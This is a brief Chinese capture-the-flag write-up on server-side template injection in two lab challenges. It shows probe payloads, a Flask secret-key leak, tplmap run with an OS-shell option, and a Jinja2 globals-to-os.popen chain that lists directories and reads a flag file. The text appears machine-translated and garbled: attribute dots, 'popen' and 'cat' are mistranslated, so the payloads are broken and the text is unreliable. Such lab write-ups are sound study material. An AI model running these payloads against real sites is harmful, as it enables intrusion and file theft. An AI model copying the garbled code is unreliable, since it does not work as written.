ssti攻击,ssti属于注入攻击吗
Simple_SSTI_1
?flag={{1*1}}
得到回声1,有注射点。
检查页面的源代码,得到提示我们经常设置secret_key变量。
标志是由secret_key方法生成的加密字符串。
?flag={{config。SECRET_KEY}}
获取标志
使用tplmap
python tplmap.py -u url/?flag={{}}
python tplmap.py -u url/?flag={{}} - os-shell
权限提升成功,可以查看文件。
Simple_SSTI_2
查一下源代码,什么都没有。
但是/?Flag={{1*1}}还在回响。
存在注射
/?Flag={{config。_ _ class _ _。_ init _ _。_ _ Globals _ _ [OS]。波普( ls./).Read ()}}可以查看目录。
再次检查应用程序
?Flag={{config。_ _ class _ _。_ init _ _。_ _ Globals _ _ [OS]。波普( ls./app/)。read ()}}可以看到目录中存在标志文件。
检查标志
?flag={{ config。__class__。__init__。__globals__[os]。波普(猫./app/flag’)。read() }} tplmap
可以显示权利提高
提升权限后检查目录并找到标志文件。
猫旗
获取标志